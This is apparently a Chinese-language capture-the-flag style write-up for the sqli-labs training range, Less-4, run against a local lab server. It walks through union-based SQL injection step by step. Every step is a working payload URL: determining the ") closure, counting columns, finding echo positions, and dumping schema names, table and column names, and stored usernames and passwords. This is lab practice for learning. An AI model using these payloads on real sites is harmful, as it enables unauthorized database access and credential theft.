sqli-labs靶场第三关less-4

1、确定注入点

http://192.168.128.3/sq/Less-4/?id=1
http://192.168.128.3/sq/Less-4/?id=2
有不同回显，判断可能存在注入，

2、判断注入类型

输入

http://192.168.128.3/sq/less-4/?id=1 and 1=1
http://192.168.128.3/sq/less-4/?id=1 and 1=2
回显一致，猜测不是数字型注

加单引号

http://192.168.128.3/sq/less-4/?id=1’
没有回显，猜测其他闭合方式
输入双引号
http://192.168.128.3/sq/Less-4/?id=1“

报出错误

由结果判断闭合方式为 ")

3、确定列数

http://192.168.128.3/sq/less-4/?id=1") order by 5 --+
http://192.168.128.3/sq/less-4/?id=1") order by 4 --+
http://192.168.128.3/sq/less-4/?id=1") order by 3 --+

4，5回显报错，3的时候回显
确定列数为3

4、确定回显位

http://192.168.128.3/sq/less-4/?id=-1") union select 1,2,3 --+

确定2，3为回显位置

5、确定数据库名，数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()–+

5、爆出数据库名，表名，列名，数据

• 爆出数据库名
  http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+
• 爆出选定数据库表名
  http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+
• 爆出列名
  http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’–+
• 爆出数据
  http://192.168.128.3/sq/less-4/?id=-1") union select 1,group_concat(username,‘%20’,password),3 from security.users–+

最终得到数据

大功告成